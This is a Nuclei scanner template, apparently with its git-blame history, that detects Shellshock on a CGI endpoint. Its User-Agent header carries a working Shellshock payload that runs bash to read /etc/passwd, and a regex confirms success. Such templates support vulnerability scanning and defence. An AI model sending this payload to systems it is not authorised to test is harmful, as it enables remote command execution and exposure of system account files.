nuclei-templates/vulnerabilities/rce-shellshock-user-agent.yaml

id: rce-user-agent-shell-shock

info:
 name: Remote Code Execution Via (User-Agent)
 author: 0xelkomy
 severity: high
 description: todo

requests:
 - method: GET
   headers:
    User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"
   path:
    - "{{BaseURL}}/cgi-bin/status"
   matchers:
    - type: regex
      regex:
       - "root:[x*]:0:0"
      part: body
Create rce-shellshock-user-agent.yaml 2020-05-28 15:20:00 +00:00			`id: rce-user-agent-shell-shock`

			`info:`
			`name: Remote Code Execution Via (User-Agent)`
			`author: 0xelkomy`
			`severity: high`
add few descriptions add few descriptions and references on /vulnerabilities/ templates. 2020-08-25 19:43:43 +00:00			`description: todo`
Create rce-shellshock-user-agent.yaml 2020-05-28 15:20:00 +00:00
			`requests:`
			`- method: GET`
			`headers:`
Improve shellshock payload 2020-08-06 08:03:58 +00:00			`User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"`
Create rce-shellshock-user-agent.yaml 2020-05-28 15:20:00 +00:00			`path:`
			`- "{{BaseURL}}/cgi-bin/status"`
			`matchers:`
Update rce-shellshock-user-agent.yaml 2020-06-03 00:08:36 +00:00			`- type: regex`
			`regex:`
			`- "root:[x*]:0:0"`
Create rce-shellshock-user-agent.yaml 2020-05-28 15:20:00 +00:00			`part: body`